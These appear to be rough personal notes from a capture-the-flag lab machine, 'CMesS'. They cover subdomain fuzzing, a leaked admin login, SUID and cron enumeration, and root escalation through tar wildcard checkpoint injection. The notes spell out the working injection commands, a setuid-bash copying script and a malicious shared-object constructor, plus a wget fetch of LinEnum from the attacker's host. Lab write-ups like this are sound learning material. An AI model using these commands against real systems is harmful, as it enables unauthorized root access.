Challenge Machine (CMesS)

can’t get easy or quick SQL

directory busting?

admin page but no way to login or create account.

subdomain? (needs etc/hosts)

wfuzz -c -f sub-fighter -w top5000.txt -u 'http://cmess.thm' -H "Host: FUZZ.cmess.thm" --hw 290

we found dev.cmess.thm

to make sure we can access it, we have to also add the subdomain in /etc/hosts

once we access it, we get this login:

andre@cmess.thm
:
KPFTN_f2yxe%

we get access as admin and can manage files. Can we reverse php?

upload but didn’t see it.*************

create it?

can’t access it

**************it uploaded into assets.

NOT WORKING

YOU CAN MAKE SURE THE COPY AND PASTE SPACING IS CORRECT BY RECOPYING FROM SOURCE

find stuff:

sudo -l

find / -type f -perm -04000 -ls 2>/dev/null

result:

793613     12 -rwsr-xr-x   1 root     root        10624 May  8  2018 /usr/bin/vmware-user-suid-wrapper
   783398     40 -rwsr-xr-x   1 root     root        40432 May 16  2017 /usr/bin/chsh
   783459     76 -rwsr-xr-x   1 root     root        75304 May 16  2017 /usr/bin/gpasswd
   783525     40 -rwsr-xr-x   1 root     root        39904 May 16  2017 /usr/bin/newgrp
   783536     56 -rwsr-xr-x   1 root     root        54256 May 16  2017 /usr/bin/passwd
   783396     52 -rwsr-xr-x   1 root     root        49584 May 16  2017 /usr/bin/chfn
   783620    136 -rwsr-xr-x   1 root     root       136808 Jul  4  2017 /usr/bin/sudo
   783722     12 -rwsr-xr-x   1 root     root        10232 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
   794343    420 -rwsr-xr-x   1 root     root       428240 Mar  4  2019 /usr/lib/openssh/ssh-keysign
   790045     44 -rwsr-xr--   1 root     messagebus    42992 Jan 12  2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
   134288    140 -rwsr-xr-x   1 root     root         142032 Jan 28  2017 /bin/ntfs-3g
   134285     32 -rwsr-xr-x   1 root     root          30800 Jul 12  2016 /bin/fusermount
   130621     40 -rwsr-xr-x   1 root     root          40152 May 16  2018 /bin/mount
   130636     44 -rwsr-xr-x   1 root     root          44680 May  7  2014 /bin/ping6
   130652     40 -rwsr-xr-x   1 root     root          40128 May 16  2017 /bin/su
   130635     44 -rwsr-xr-x   1 root     root          44168 May  7  2014 /bin/ping
   130670     28 -rwsr-xr-x   1 root     root          27608 May 16  2018 /bin/umount

new search

strace /usr/bin/vmware-user-suid-wrapper 2>&1 | grep -i -E "open|access|no such file"

result:

access("/etc/suid-debug", F_OK)         = -1 ENOENT (No such file or directory)
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
vmware-user: could not open /proc/fs/vmblock/dev

can we make file in etc?

__________________________________________________________________________________________________________

this might take too much time. Check crons first:

cat /etc/crontab

result:

*/2 *   * * *   root    cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz *

we can do checkpoints!

make the exploit file:

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > runme.sh

give it perms:

chmod +x runme.sh

exploit:

format:

tar czf /tmp/backup.tar.gz <do something>

now:

tar -zcf /tmp/andre_backup.tar.gz *

but it CDs into backup folder first. So we need to go there first as well!

touch /home/andre/backup/--checkpoint=1

touch /home/andre/backup/--checkpoint-action=exec=sh\ runme.sh

********* We can come back to this but we can’t touch in andre’s

now we check until the tmp/bash is created:

ls -la /tmp

once it is, we can run it:

/tmp/bash -p

we have root!

__________________________________________________________________________________________________________

capabilities?

getcap -r / 2>/dev/null

result:

/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep
/usr/bin/mtr = cap_net_raw+ep

__________________________________________________________________________________________________________

back to shared object injection:

#include <stdio.h>
#include <stdlib.h>

static void inject() __attribute__((constructor));

void inject() {
	system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}

access("/etc/suid-debug", F_OK)

cd /home/tmp/
nano suid-debug.c
ctrl+x
y

gcc -shared -fPIC -o /home/user/.config/libcalc.so /home/user/libcalc.c

non work. Try LinPEAS or LinEnum?

transfer them:

wget http://10.6.62.12:8920/LinEnum.sh

host up the files:

python3 -m http.server 8920

what is .bak files?

cat /opt/.password.bak

we get ssh for user andre:

ssh andre@10.10.234.116
UQfsdCB7aAP6

now we can go back and do checkpoints! (go above)